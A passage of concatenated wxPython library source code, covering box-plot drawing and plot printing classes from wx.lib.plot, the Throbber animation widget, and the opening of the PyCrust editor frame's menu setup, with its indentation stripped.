+ [ ] change the X axis to some labels.
+ [ ] Change getClosestPoint to only grab box plot items and outlers?
Currently grabs every data point.
+ [ ] Add more customization such as Pens/Brushes, outlier shapes/size,
and box width.
+ [ ] Figure out how I want to handle log-y: log data then calcBP? Or
should I calc the BP first then the plot it on a log scale?
"""
_attributes = {'colour': 'black',
'width': 1,
'style': wx.PENSTYLE_SOLID,
'legend': '',
}
def __init__(self, points, **attr):
# Set various attributes
self.box_width = 0.5
# Determine the X position and create a 1d dataset.
self.xpos = points[0, 0]
points = points[:, 1]
# Calculate the box plot points and the outliers
self._bpdata = self.calcBpData(points)
self._outliers = self.calcOutliers(points)
points = np.concatenate((self._bpdata, self._outliers))
points = np.array([(self.xpos, x) for x in points])
# Create a jitter for the outliers
self.jitter = (0.05 * np.random.random_sample(len(self._outliers))
+ self.xpos - 0.025)
# Init the parent class
PolyPoints.__init__(self, points, attr)
def _clean_data(self, data=None):
"""
Removes NaN and Inf from the data.
"""
if data is None:
data = self.points
# clean out NaN and infinity values.
data = data[~np.isnan(data)]
data = data[~np.isinf(data)]
return data
def boundingBox(self):
"""
Returns bounding box for the plot.
Override method.
"""
xpos = self.xpos
minXY = np.array([xpos - self.box_width / 2, self._bpdata.min * 0.95])
maxXY = np.array([xpos + self.box_width / 2, self._bpdata.max * 1.05])
return minXY, maxXY
def getClosestPoint(self, pntXY, pointScaled=True):
"""
Returns the index of closest point on the curve, pointXY,
scaledXY, distance x, y in user coords.
Override method.
if pointScaled == True, then based on screen coords
if pointScaled == False, then based on user coords
"""
xpos = self.xpos
# combine the outliers with the box plot data
data_to_use = np.concatenate((self._bpdata, self._outliers))
data_to_use = np.array([(xpos, x) for x in data_to_use])
if pointScaled:
# Use screen coords
p = self.scaled
pxy = self.currentScale * np.array(pntXY) + self.currentShift
else:
# Using user coords
p = self._points
pxy = np.array(pntXY)
# determine distnace for each point
d = np.sqrt(np.add.reduce((p - pxy) ** 2, 1)) # sqrt(dx^2+dy^2)
pntIndex = np.argmin(d)
dist = d[pntIndex]
return [pntIndex,
self.points[pntIndex],
self.scaled[pntIndex] / self._pointSize,
dist]
def getSymExtent(self, printerScale):
"""Width and Height of Marker"""
# TODO: does this need to be updated?
h = self.attributes['width'] * printerScale * self._pointSize[0]
w = 5 * h
return (w, h)
def calcBpData(self, data=None):
"""
Box plot points:
Median (50%)
75%
25%
low_whisker = lowest value that's >= (25% - (IQR * 1.5))
high_whisker = highest value that's <= 75% + (IQR * 1.5)
outliers are outside of 1.5 * IQR
Parameters
----------
data : array-like
The data to plot
Returns
-------
bpdata : collections.namedtuple
Descriptive statistics for data:
(min_data, low_whisker, q25, median, q75, high_whisker, max_data)
"""
data = self._clean_data(data)
min_data = float(np.min(data))
max_data = float(np.max(data))
q25 = float(np.percentile(data, 25))
q75 = float(np.percentile(data, 75))
iqr = q75 - q25
low_whisker = float(data[data >= q25 - 1.5 * iqr].min())
high_whisker = float(data[data <= q75 + 1.5 * iqr].max())
median = float(np.median(data))
BPData = namedtuple("bpdata", ("min", "low_whisker", "q25", "median",
"q75", "high_whisker", "max"))
bpdata = BPData(min_data, low_whisker, q25, median,
q75, high_whisker, max_data)
return bpdata
def calcOutliers(self, data=None):
"""
Calculates the outliers. Must be called after calcBpData.
"""
data = self._clean_data(data)
outliers = data
outlier_bool = np.logical_or(outliers > self._bpdata.high_whisker,
outliers < self._bpdata.low_whisker)
outliers = outliers[outlier_bool]
return outliers
def _scaleAndShift(self, data, scale=(1, 1), shift=(0, 0)):
"""same as override method, but retuns a value."""
scaled = scale * data + shift
return scaled
@TempStyle('pen')
def draw(self, dc, printerScale, coord=None):
"""
Draws a box plot on the DC.
Notes
-----
The following draw order is required:
1. First the whisker line
2. Then the IQR box
3. Lasly the median line.
This is because
+ The whiskers are drawn as single line rather than two lines
+ The median line must be visable over the box if the box has a fill.
Other than that, the draw order can be changed.
"""
self._draw_whisker(dc, printerScale)
self._draw_iqr_box(dc, printerScale)
self._draw_median(dc, printerScale) # median after box
self._draw_whisker_ends(dc, printerScale)
self._draw_outliers(dc, printerScale)
@TempStyle('pen')
def _draw_whisker(self, dc, printerScale):
"""Draws the whiskers as a single line"""
xpos = self.xpos
# We draw it as one line and then hide the middle part with
# the IQR rectangle
whisker_line = np.array([[xpos, self._bpdata.low_whisker],
[xpos, self._bpdata.high_whisker]])
whisker_line = self._scaleAndShift(whisker_line,
self.currentScale,
self.currentShift)
whisker_pen = wx.Pen(wx.BLACK, 2, wx.PENSTYLE_SOLID)
whisker_pen.SetCap(wx.CAP_BUTT)
dc.SetPen(whisker_pen)
dc.DrawLines(whisker_line)
@TempStyle('pen')
def _draw_iqr_box(self, dc, printerScale):
"""Draws the Inner Quartile Range box"""
xpos = self.xpos
box_w = self.box_width
iqr_box = [[xpos - box_w / 2, self._bpdata.q75], # left, top
[xpos + box_w / 2, self._bpdata.q25]] # right, bottom
# Scale it to the plot area
iqr_box = self._scaleAndShift(iqr_box,
self.currentScale,
self.currentShift)
# rectangles are drawn (left, top, width, height) so adjust
iqr_box = [iqr_box[0][0], # X (left)
iqr_box[0][1], # Y (top)
iqr_box[1][0] - iqr_box[0][0], # Width
iqr_box[1][1] - iqr_box[0][1]] # Height
box_pen = wx.Pen(wx.BLACK, 3, wx.PENSTYLE_SOLID)
box_brush = wx.Brush(wx.GREEN, wx.BRUSHSTYLE_SOLID)
dc.SetPen(box_pen)
dc.SetBrush(box_brush)
dc.DrawRectangleList([iqr_box])
@TempStyle('pen')
def _draw_median(self, dc, printerScale, coord=None):
"""Draws the median line"""
xpos = self.xpos
median_line = np.array(
[[xpos - self.box_width / 2, self._bpdata.median],
[xpos + self.box_width / 2, self._bpdata.median]]
)
median_line = self._scaleAndShift(median_line,
self.currentScale,
self.currentShift)
median_pen = wx.Pen(wx.BLACK, 4, wx.PENSTYLE_SOLID)
median_pen.SetCap(wx.CAP_BUTT)
dc.SetPen(median_pen)
dc.DrawLines(median_line)
@TempStyle('pen')
def _draw_whisker_ends(self, dc, printerScale):
"""Draws the end caps of the whiskers"""
xpos = self.xpos
fence_top = np.array(
[[xpos - self.box_width * 0.2, self._bpdata.high_whisker],
[xpos + self.box_width * 0.2, self._bpdata.high_whisker]]
)
fence_top = self._scaleAndShift(fence_top,
self.currentScale,
self.currentShift)
fence_bottom = np.array(
[[xpos - self.box_width * 0.2, self._bpdata.low_whisker],
[xpos + self.box_width * 0.2, self._bpdata.low_whisker]]
)
fence_bottom = self._scaleAndShift(fence_bottom,
self.currentScale,
self.currentShift)
fence_pen = wx.Pen(wx.BLACK, 2, wx.PENSTYLE_SOLID)
fence_pen.SetCap(wx.CAP_BUTT)
dc.SetPen(fence_pen)
dc.DrawLines(fence_top)
dc.DrawLines(fence_bottom)
@TempStyle('pen')
def _draw_outliers(self, dc, printerScale):
"""Draws dots for the outliers"""
# Set the pen
outlier_pen = wx.Pen(wx.BLUE, 5, wx.PENSTYLE_SOLID)
dc.SetPen(outlier_pen)
outliers = self._outliers
# Scale the data for plotting
pt_data = np.array([self.jitter, outliers]).T
pt_data = self._scaleAndShift(pt_data,
self.currentScale,
self.currentShift)
# Draw the outliers
size = 0.5
fact = 2.5 * size
wh = 5.0 * size
rect = np.zeros((len(pt_data), 4), np.float) + [0.0, 0.0, wh, wh]
rect[:, 0:2] = pt_data - [fact, fact]
dc.DrawRectangleList(rect.astype(np.int32))
class PlotGraphics(object):
"""
Creates a PlotGraphics object.
:param objects: The Poly objects to plot.
:type objects: list of :class:`~wx.lib.plot.PolyPoints` objects
:param title: The title shown at the top of the graph.
:type title: str
:param xLabel: The x-axis label.
:type xLabel: str
:param yLabel: The y-axis label.
:type yLabel: str
.. warning::
All methods except ``__init__`` are private.
"""
def __init__(self, objects, title='', xLabel='', yLabel=''):
if type(objects) not in [list, tuple]:
raise TypeError("objects argument should be list or tuple")
self.objects = objects
self._title = title
self._xLabel = xLabel
self._yLabel = yLabel
self._pointSize = (1.0, 1.0)
@property
def logScale(self):
if len(self.objects) == 0:
return
return [obj.logScale for obj in self.objects]
@logScale.setter
def logScale(self, logscale):
# XXX: error checking done by PolyPoints class
# if not isinstance(logscale, tuple) and len(logscale) != 2:
# raise TypeError("logscale must be a 2-tuple of bools")
if len(self.objects) == 0:
return
for obj in self.objects:
obj.logScale = logscale
def setLogScale(self, logscale):
"""
Set the log scale boolean value.
.. deprecated:: Feb 27, 2016
Use the :attr:`~wx.lib.plot.polyobjects.PlotGraphics.logScale`
property instead.
"""
pendingDeprecation("self.logScale property")
self.logScale = logscale
@property
def absScale(self):
if len(self.objects) == 0:
return
return [obj.absScale for obj in self.objects]
@absScale.setter
def absScale(self, absscale):
# XXX: error checking done by PolyPoints class
# if not isinstance(absscale, tuple) and len(absscale) != 2:
# raise TypeError("absscale must be a 2-tuple of bools")
if len(self.objects) == 0:
return
for obj in self.objects:
obj.absScale = absscale
def boundingBox(self):
p1, p2 = self.objects[0].boundingBox()
for o in self.objects[1:]:
p1o, p2o = o.boundingBox()
p1 = np.minimum(p1, p1o)
p2 = np.maximum(p2, p2o)
return p1, p2
def scaleAndShift(self, scale=(1, 1), shift=(0, 0)):
for o in self.objects:
o.scaleAndShift(scale, shift)
def setPrinterScale(self, scale):
"""
Thickens up lines and markers only for printing
.. deprecated:: Feb 27, 2016
Use the :attr:`~wx.lib.plot.polyobjects.PlotGraphics.printerScale`
property instead.
"""
pendingDeprecation("self.printerScale property")
self.printerScale = scale
def setXLabel(self, xLabel=''):
"""
Set the X axis label on the graph
.. deprecated:: Feb 27, 2016
Use the :attr:`~wx.lib.plot.polyobjects.PlotGraphics.xLabel`
property instead.
"""
pendingDeprecation("self.xLabel property")
self.xLabel = xLabel
def setYLabel(self, yLabel=''):
"""
Set the Y axis label on the graph
.. deprecated:: Feb 27, 2016
Use the :attr:`~wx.lib.plot.polyobjects.PlotGraphics.yLabel`
property instead.
"""
pendingDeprecation("self.yLabel property")
self.yLabel = yLabel
def setTitle(self, title=''):
"""
Set the title at the top of graph
.. deprecated:: Feb 27, 2016
Use the :attr:`~wx.lib.plot.polyobjects.PlotGraphics.title`
property instead.
"""
pendingDeprecation("self.title property")
self.title = title
def getXLabel(self):
"""
Get X axis label string
.. deprecated:: Feb 27, 2016
Use the :attr:`~wx.lib.plot.polyobjects.PlotGraphics.xLabel`
property instead.
"""
pendingDeprecation("self.xLabel property")
return self.xLabel
def getYLabel(self):
"""
Get Y axis label string
.. deprecated:: Feb 27, 2016
Use the :attr:`~wx.lib.plot.polyobjects.PlotGraphics.yLabel`
property instead.
"""
pendingDeprecation("self.yLabel property")
return self.yLabel
def getTitle(self, title=''):
"""
Get the title at the top of graph
.. deprecated:: Feb 27, 2016
Use the :attr:`~wx.lib.plot.polyobjects.PlotGraphics.title`
property instead.
"""
pendingDeprecation("self.title property")
return self.title
@property
def printerScale(self):
return self._printerScale
@printerScale.setter
def printerScale(self, scale):
"""Thickens up lines and markers only for printing"""
self._printerScale = scale
@property
def xLabel(self):
"""Get the X axis label on the graph"""
return self._xLabel
@xLabel.setter
def xLabel(self, text):
self._xLabel = text
@property
def yLabel(self):
"""Get the Y axis label on the graph"""
return self._yLabel
@yLabel.setter
def yLabel(self, text):
self._yLabel = text
@property
def title(self):
"""Get the title at the top of graph"""
return self._title
@title.setter
def title(self, text):
self._title = text
def draw(self, dc):
for o in self.objects:
# t=_time.perf_counter() # profile info
o._pointSize = self._pointSize
o.draw(dc, self._printerScale)
# print(o, "time=", _time.perf_counter()-t)
def getSymExtent(self, printerScale):
"""Get max width and height of lines and markers symbols for legend"""
self.objects[0]._pointSize = self._pointSize
symExt = self.objects[0].getSymExtent(printerScale)
for o in self.objects[1:]:
o._pointSize = self._pointSize
oSymExt = o.getSymExtent(printerScale)
symExt = np.maximum(symExt, oSymExt)
return symExt
def getLegendNames(self):
"""Returns list of legend names"""
lst = [None] * len(self)
for i in range(len(self)):
lst[i] = self.objects[i].getLegend()
return lst
def __len__(self):
return len(self.objects)
def __getitem__(self, item):
return self.objects[item]
# -------------------------------------------------------------------------
# Used to layout the printer page
class PlotPrintout(wx.Printout):
"""Controls how the plot is made in printing and previewing"""
# Do not change method names in this class,
# we have to override wx.Printout methods here!
def __init__(self, graph):
"""graph is instance of plotCanvas to be printed or previewed"""
wx.Printout.__init__(self)
self.graph = graph
def HasPage(self, page):
if page == 1:
return True
else:
return False
def GetPageInfo(self):
return (1, 1, 1, 1) # disable page numbers
def OnPrintPage(self, page):
dc = self.GetDC() # allows using floats for certain functions
# print("PPI Printer",self.GetPPIPrinter())
# print("PPI Screen", self.GetPPIScreen())
# print("DC GetSize", dc.GetSize())
# print("GetPageSizePixels", self.GetPageSizePixels())
# Note PPIScreen does not give the correct number
# Calulate everything for printer and then scale for preview
PPIPrinter = self.GetPPIPrinter() # printer dots/inch (w,h)
# PPIScreen= self.GetPPIScreen() # screen dots/inch (w,h)
dcSize = dc.GetSize() # DC size
if self.graph._antiAliasingEnabled and not isinstance(dc, wx.GCDC):
try:
dc = wx.GCDC(dc)
except Exception:
pass
else:
if self.graph._hiResEnabled:
# high precision - each logical unit is 1/20 of a point
dc.SetMapMode(wx.MM_TWIPS)
pageSize = self.GetPageSizePixels() # page size in terms of pixcels
clientDcSize = self.graph.GetClientSize()
# find what the margins are (mm)
pgSetupData = self.graph.pageSetupData
margLeftSize, margTopSize = pgSetupData.GetMarginTopLeft()
margRightSize, margBottomSize = pgSetupData.GetMarginBottomRight()
# calculate offset and scale for dc
pixLeft = margLeftSize * PPIPrinter[0] / 25.4 # mm*(dots/in)/(mm/in)
pixRight = margRightSize * PPIPrinter[0] / 25.4
pixTop = margTopSize * PPIPrinter[1] / 25.4
pixBottom = margBottomSize * PPIPrinter[1] / 25.4
plotAreaW = pageSize[0] - (pixLeft + pixRight)
plotAreaH = pageSize[1] - (pixTop + pixBottom)
# ratio offset and scale to screen size if preview
if self.IsPreview():
ratioW = float(dcSize[0]) / pageSize[0]
ratioH = float(dcSize[1]) / pageSize[1]
pixLeft *= ratioW
pixTop *= ratioH
plotAreaW *= ratioW
plotAreaH *= ratioH
# rescale plot to page or preview plot area
self.graph._setSize(plotAreaW, plotAreaH)
# Set offset and scale
dc.SetDeviceOrigin(pixLeft, pixTop)
# Thicken up pens and increase marker size for printing
ratioW = float(plotAreaW) / clientDcSize[0]
ratioH = float(plotAreaH) / clientDcSize[1]
aveScale = (ratioW + ratioH) / 2
if self.graph._antiAliasingEnabled and not self.IsPreview():
scale = dc.GetUserScale()
dc.SetUserScale(scale[0] / self.graph._pointSize[0],
scale[1] / self.graph._pointSize[1])
self.graph._setPrinterScale(aveScale) # tickens up pens for printing
self.graph._printDraw(dc)
# rescale back to original
self.graph._setSize()
self.graph._setPrinterScale(1)
self.graph.Redraw() # to get point label scale and shift correct
return True
```
#### File: wx/lib/throbber.py
```python
import os
import wx
# ------------------------------------------------------------------------------
THROBBER_EVENT = wx.NewEventType()
EVT_UPDATE_THROBBER = wx.PyEventBinder(THROBBER_EVENT, 0)
class UpdateThrobberEvent(wx.PyEvent):
def __init__(self):
wx.PyEvent.__init__(self)
self.SetEventType(THROBBER_EVENT)
# ------------------------------------------------------------------------------
class Throbber(wx.Panel):
"""
The first argument is either the name of a file that will be split into frames
(a composite image) or a list of strings of image names that will be treated
as individual frames. If a single (composite) image is given, then additional
information must be provided: the number of frames in the image and the width
of each frame. The first frame is treated as the "at rest" frame (it is not
shown during animation, but only when Throbber.Rest() is called.
A second, single image may be optionally specified to overlay on top of the
animation. A label may also be specified to show on top of the animation.
"""
def __init__(self, parent, id,
bitmap,
pos = wx.DefaultPosition,
size = wx.DefaultSize,
frameDelay = 0.1,
frames = 0,
frameWidth = 0,
label = None,
overlay = None,
reverse = 0,
style = 0,
name = "throbber",
rest = 0,
current = 0,
direction = 1,
sequence = None
):
"""
Default class constructor.
:param `parent`: parent window, must not be ``None``
:param integer `id`: window identifier. A value of -1 indicates a default value
:param `bitmap`: a :class:`wx.Bitmap` to be used
:param `pos`: the control position. A value of (-1, -1) indicates a default position,
chosen by either the windowing system or wxPython, depending on platform
:param `size`: the control size. A value of (-1, -1) indicates a default size,
chosen by either the windowing system or wxPython, depending on platform
:param `frameDelay`: time delay between frames
:param `frames`: number of frames (only necessary for composite image)
:param `frameWidth`: width of each frame (only necessary for composite image)
:param string `label`: optional text to be displayed
:param `overlay`: optional :class:`wx.Bitmap` to overlay on animation
:param boolean `reverse`: reverse direction at end of animation
:param integer `style`: the underlying :class:`wx.Control` style
:param string `name`: the widget name.
:param `rest`: the rest frame
:param `current`: the current frame
:param `direction`: 1 advances = -1 reverses
:param `sequence`: sequence of frames, defaults to range(self.frames)
"""
super(Throbber, self).__init__(parent, id, pos, size, style, name)
self.name = name
self.label = label
self.running = (1 != 1)
_seqTypes = (type([]), type(()))
# set size, guessing if necessary
width, height = size
if width == -1:
if type(bitmap) in _seqTypes:
width = bitmap[0].GetWidth()
else:
if frameWidth:
width = frameWidth
if height == -1:
if type(bitmap) in _seqTypes:
height = bitmap[0].GetHeight()
else:
height = bitmap.GetHeight()
self.width, self.height = width, height
# double check it
assert width != -1 and height != -1, "Unable to guess size"
if label:
extentX, extentY = self.GetTextExtent(label)
self.labelX = (width - extentX)/2
self.labelY = (height - extentY)/2
self.frameDelay = frameDelay
self.rest = rest
self.current = current
self.direction = direction
self.autoReverse = reverse
self.overlay = overlay
if overlay is not None:
self.overlay = overlay
self.overlayX = (width - self.overlay.GetWidth()) / 2
self.overlayY = (height - self.overlay.GetHeight()) / 2
self.showOverlay = overlay is not None
self.showLabel = label is not None
# do we have a sequence of images?
if type(bitmap) in _seqTypes:
self.submaps = bitmap
self.frames = len(self.submaps)
# or a composite image that needs to be split?
else:
self.frames = frames
self.submaps = []
for chunk in range(frames):
rect = (chunk * frameWidth, 0, width, height)
self.submaps.append(bitmap.GetSubBitmap(rect))
# self.sequence can be changed, but it's not recommended doing it
# while the throbber is running. self.sequence[0] should always
# refer to whatever frame is to be shown when 'resting' and be sure
# that no item in self.sequence >= self.frames or < 0!!!
self.SetSequence(sequence)
self.SetClientSize((width, height))
timerID = wx.NewIdRef()
self.timer = wx.Timer(self, timerID)
self.Bind(EVT_UPDATE_THROBBER, self.Update)
self.Bind(wx.EVT_PAINT, self.OnPaint)
self.Bind(wx.EVT_TIMER, self.OnTimer, self.timer)
self.Bind(wx.EVT_WINDOW_DESTROY, self.OnDestroyWindow)
def DoGetBestSize(self):
"""
Get the best size of the widget.
:returns: the width and height
"""
return (self.width, self.height)
def OnTimer(self, event):
"""
Handles the ``wx.EVT_TIMER`` event for :class:`Throbber`.
:param `event`: a :class:`TimerEvent` event to be processed.
"""
wx.PostEvent(self, UpdateThrobberEvent())
def OnDestroyWindow(self, event):
"""
Handles the ``wx.EVT_WINDOW_DESTROY`` event for :class:`Throbber`.
:param `event`: a :class:`wx.WindowDestroyEvent` event to be processed.
"""
self.Stop()
event.Skip()
def Draw(self, dc):
"""
Draw the widget.
:param `dc`: the :class:`wx.DC` to draw on
"""
dc.DrawBitmap(self.submaps[self.sequence[self.current]], 0, 0, True)
if self.overlay and self.showOverlay:
dc.DrawBitmap(self.overlay, self.overlayX, self.overlayY, True)
if self.label and self.showLabel:
dc.DrawText(self.label, self.labelX, self.labelY)
dc.SetTextForeground(wx.WHITE)
dc.DrawText(self.label, self.labelX-1, self.labelY-1)
def OnPaint(self, event):
"""
Handles the ``wx.EVT_PAINT`` event for :class:`Throbber`.
:param `event`: a :class:`PaintEvent` event to be processed.
"""
self.Draw(wx.PaintDC(self))
event.Skip()
def Update(self, event):
"""
Handles the ``EVT_UPDATE_THROBBER`` event for :class:`ResizeWidget`.
:param `event`: a :class:`UpdateThrobberEvent` event to be processed.
"""
self.Next()
def Wrap(self):
"""Wrap the throbber around."""
if self.current >= len(self.sequence):
if self.autoReverse:
self.Reverse()
self.current = len(self.sequence) - 1
else:
self.current = 0
if self.current < 0:
if self.autoReverse:
self.Reverse()
self.current = 0
else:
self.current = len(self.sequence) - 1
self.Draw(wx.ClientDC(self))
# --------- public methods ---------
def SetFont(self, font):
"""
Set the font for the label.
:param `font`: the :class:`wx.Font` to use
"""
wx.Panel.SetFont(self, font)
self.SetLabel(self.label)
self.Draw(wx.ClientDC(self))
def Rest(self):
"""Stop the animation and return to frame 0."""
self.Stop()
self.current = self.rest
self.Draw(wx.ClientDC(self))
def Reverse(self):
"""Change the direction of the animation."""
self.direction = -self.direction
def Running(self):
"""Returns True if the animation is running."""
return self.running
def Start(self):
"""Start the animation."""
if not self.running:
self.running = not self.running
self.timer.Start(int(self.frameDelay * 1000))
def Stop(self):
"""Stop the animation."""
if self.running:
self.timer.Stop()
self.running = not self.running
def SetCurrent(self, current):
"""
Set current image.
:param int `current`: the index to the current image
"""
running = self.Running()
if not running:
#FIXME: need to make sure value is within range!!!
self.current = current
self.Draw(wx.ClientDC(self))
def SetRest(self, rest):
"""
Set rest image.
:param int `rest`: the index for the rest frame.
"""
self.rest = rest
def SetSequence(self, sequence = None):
"""
Order to display images in.
:param `sequence`: a sequence containing the order to display images in.
"""
# self.sequence can be changed, but it's not recommended doing it
# while the throbber is running. self.sequence[0] should always
# refer to whatever frame is to be shown when 'resting' and be sure
# that no item in self.sequence >= self.frames or < 0!!!
running = self.Running()
self.Stop()
if sequence is not None:
#FIXME: need to make sure values are within range!!!
self.sequence = sequence
else:
self.sequence = list(range(self.frames))
if running:
self.Start()
def Increment(self):
"""Display next image in sequence."""
self.current += 1
self.Wrap()
def Decrement(self):
"""Display previous image in sequence."""
self.current -= 1
self.Wrap()
def Next(self):
"""Display next image in sequence according to direction."""
self.current += self.direction
self.Wrap()
def Previous(self):
"""Display previous image in sequence according to direction."""
self.current -= self.direction
self.Wrap()
def SetFrameDelay(self, frameDelay = 0.05):
"""
Delay between each frame.
:param float `frameDelay`: the delay between frames.
"""
self.frameDelay = frameDelay
if self.running:
self.Stop()
self.Start()
def ToggleOverlay(self, state = None):
"""
Toggle the overlay image.
:param boolean `state`: set the overlay state or if None toggle state.
"""
if state is None:
self.showOverlay = not self.showOverlay
else:
self.showOverlay = state
self.Draw(wx.ClientDC(self))
def ToggleLabel(self, state = None):
"""
Toggle the label.
:param boolean `state`: set the label state or if None toggle state.
"""
if state is None:
self.showLabel = not self.showLabel
else:
self.showLabel = state
self.Draw(wx.ClientDC(self))
def SetLabel(self, label):
"""
Change the text of the label.
:param string `label`: the label text.
"""
self.label = label
if label:
extentX, extentY = self.GetTextExtent(label)
self.labelX = (self.width - extentX)/2
self.labelY = (self.height - extentY)/2
self.Draw(wx.ClientDC(self))
# ------------------------------------------------------------------------------
```
#### File: wx/py/frame.py
```python
__author__ = "<NAME> <<EMAIL>>"
import wx
import os
from .version import VERSION
from . import editwindow
from . import dispatcher
ID_NEW = wx.ID_NEW
ID_OPEN = wx.ID_OPEN
ID_REVERT = wx.ID_REVERT
ID_CLOSE = wx.ID_CLOSE
ID_SAVE = wx.ID_SAVE
ID_SAVEAS = wx.ID_SAVEAS
ID_PRINT = wx.ID_PRINT
ID_EXIT = wx.ID_EXIT
ID_UNDO = wx.ID_UNDO
ID_REDO = wx.ID_REDO
ID_CUT = wx.ID_CUT
ID_COPY = wx.ID_COPY
ID_PASTE = wx.ID_PASTE
ID_CLEAR = wx.ID_CLEAR
ID_SELECTALL = wx.ID_SELECTALL
ID_EMPTYBUFFER = wx.NewIdRef()
ID_ABOUT = wx.ID_ABOUT
ID_HELP = wx.NewIdRef()
ID_AUTOCOMP_SHOW = wx.NewIdRef()
ID_AUTOCOMP_MAGIC = wx.NewIdRef()
ID_AUTOCOMP_SINGLE = wx.NewIdRef()
ID_AUTOCOMP_DOUBLE = wx.NewIdRef()
ID_CALLTIPS_SHOW = wx.NewIdRef()
ID_CALLTIPS_INSERT = wx.NewIdRef()
ID_COPY_PLUS = wx.NewIdRef()
ID_NAMESPACE = wx.NewIdRef()
ID_PASTE_PLUS = wx.NewIdRef()
ID_WRAP = wx.NewIdRef()
ID_TOGGLE_MAXIMIZE = wx.NewIdRef()
ID_SHOW_LINENUMBERS = wx.NewIdRef()
ID_ENABLESHELLMODE = wx.NewIdRef()
ID_ENABLEAUTOSYMPY = wx.NewIdRef()
ID_AUTO_SAVESETTINGS = wx.NewIdRef()
ID_SAVEACOPY = wx.NewIdRef()
ID_SAVEHISTORY = wx.NewIdRef()
ID_SAVEHISTORYNOW = wx.NewIdRef()
ID_CLEARHISTORY = wx.NewIdRef()
ID_SAVESETTINGS = wx.NewIdRef()
ID_DELSETTINGSFILE = wx.NewIdRef()
ID_EDITSTARTUPSCRIPT = wx.NewIdRef()
ID_EXECSTARTUPSCRIPT = wx.NewIdRef()
ID_SHOWPYSLICESTUTORIAL = wx.NewIdRef()
ID_FIND = wx.ID_FIND
ID_FINDNEXT = wx.NewIdRef()
ID_FINDPREVIOUS = wx.NewIdRef()
ID_SHOWTOOLS = wx.NewIdRef()
ID_HIDEFOLDINGMARGIN = wx.NewIdRef()
class Frame(wx.Frame):
"""Frame with standard menu items."""
def __init__(self, parent=None, id=-1, title='Editor',
pos=wx.DefaultPosition, size=wx.DefaultSize,
style=wx.DEFAULT_FRAME_STYLE,shellName='PyCrust'):
"""Create a Frame instance."""
wx.Frame.__init__(self, parent, id, title, pos, size, style)
self.CreateStatusBar()
self.SetStatusText('Frame')
self.shellName=shellName
from . import images
self.SetIcon(images.getPyIcon(shellName=shellName))
self.__createMenus()
self.iconized = False
self.findDlg = None
self.findData = wx.FindReplaceData()
self.findData.SetFlags(wx.FR_DOWN)
self.Bind(wx.EVT_CLOSE, self.OnClose)
self.Bind(wx.EVT_ICONIZE, self.OnIconize)
def OnIconize(self, event):
"""Event handler for Iconize."""
self.iconized = event.Iconized()
def OnClose(self, event):
"""Event handler for closing."""
self.Destroy()
def __createMenus(self):
# File Menu
m = self.fileMenu = wx.Menu()
m.Append(ID_NEW, '&New \tCtrl+N',
'New file')
m.Append(ID_OPEN, '&Open... \tCtrl+O',
'Open file')
m.AppendSeparator()
m.Append(ID_REVERT, '&Revert \tCtrl+R',
'Revert to last saved version')
m.Append(ID_CLOSE, '&Close \tCtrl+W',
'Close file')
m.AppendSeparator()
m.Append(ID_SAVE, '&Save... \tCtrl+S',
'Save file')
m.Append(ID_SAVEAS, 'Save &As \tCtrl+Shift+S',
'Save file with new name')
if self.shellName in ['PySlices','SymPySlices']:
m.Append(ID_SAVEACOPY, 'Save A Cop&y',
'Save a copy of the file without changing the current file')
m.AppendSeparator()
m.Append(ID_PRINT, '&Print... \tCtrl+P',
'Print file')
m.AppendSeparator()
m.Append(ID_NAMESPACE, '&Update Namespace \tCtrl+Shift+N',
'Update namespace for autocompletion and calltips')
m.AppendSeparator()
m.Append(ID_EXIT, 'E&xit\tCtrl+Q', 'Exit Program')
# Edit
m = self.editMenu = wx.Menu()
m.Append(ID_UNDO, '&Undo \tCtrl+Z',
'Undo the last action')
m.Append(ID_REDO, '&Redo \tCtrl+Y',
'Redo the last undone action')
m.AppendSeparator()
m.Append(ID_CUT, 'Cu&t \tCtrl+X',
'Cut the selection')
m.Append(ID_COPY, '&Copy \tCtrl+C',
'Copy the selection')
m.Append(ID_COPY_PLUS, 'Cop&y Plus \tCtrl+Shift+C',
'Copy the selection - retaining prompts')
m.Append(ID_PASTE, '&Paste \tCtrl+V', 'Paste from clipboard')
m.Append(ID_PASTE_PLUS, 'Past&e Plus \tCtrl+Shift+V',
'Paste and run commands')
m.AppendSeparator()
m.Append(ID_CLEAR, 'Cle&ar',
'Delete the selection')
m.Append(ID_SELECTALL, 'Select A&ll \tCtrl+A',
'Select all text')
m.AppendSeparator()
m.Append(ID_EMPTYBUFFER, 'E&mpty Buffer...',
'Delete all the contents of the edit buffer')
m.Append(ID_FIND, '&Find Text... \tCtrl+F',
'Search for text in the edit buffer')
m.Append(ID_FINDNEXT, 'Find &Next \tCtrl+G',
'Find next instance of the search text')
m.Append(ID_FINDPREVIOUS, 'Find Pre&vious \tCtrl+Shift+G',
'Find previous instance of the search text')
# View
m = self.viewMenu = wx.Menu()
m.Append(ID_WRAP, '&Wrap Lines\tCtrl+Shift+W',
'Wrap lines at right edge', wx.ITEM_CHECK)
m.Append(ID_SHOW_LINENUMBERS, '&Show Line Numbers\tCtrl+Shift+L',
'Show Line Numbers', wx.ITEM_CHECK)
m.Append(ID_TOGGLE_MAXIMIZE, '&Toggle Maximize\tF11',
'Maximize/Restore Application')
if hasattr(self, 'ToggleTools'):
m.Append(ID_SHOWTOOLS,
'Show &Tools\tF4',
'Show the filling and other tools', wx.ITEM_CHECK)
if self.shellName==['PySlices','SymPySlices']:
m.Append(ID_HIDEFOLDINGMARGIN,
'&Hide Folding Margin',
'Hide Folding Margin', wx.ITEM_CHECK)
# Options
m = self.autocompMenu = wx.Menu()
m.Append(ID_AUTOCOMP_SHOW, 'Show &Auto Completion\tCtrl+Shift+A',
'Show auto completion list', wx.ITEM_CHECK)
m.Append(ID_AUTOCOMP_MAGIC, 'Include &Magic Attributes\tCtrl+Shift+M',
'Include attributes visible to __getattr__ and __setattr__',
wx.ITEM_CHECK)
m.Append(ID_AUTOCOMP_SINGLE, 'Include Single &Underscores\tCtrl+Shift+U',
'Include attibutes prefixed by a single underscore', wx.ITEM_CHECK)
m.Append(ID_AUTOCOMP_DOUBLE, 'Include &Double Underscores\tCtrl+Shift+D',
'Include attibutes prefixed by a double underscore', wx.ITEM_CHECK)
m = self.calltipsMenu = wx.Menu()
m.Append(ID_CALLTIPS_SHOW, 'Show Call &Tips\tCtrl+Shift+T',
'Show call tips with argument signature and docstring', wx.ITEM_CHECK)
m.Append(ID_CALLTIPS_INSERT, '&Insert Call Tips\tCtrl+Shift+I',
'&Insert Call Tips', wx.ITEM_CHECK)
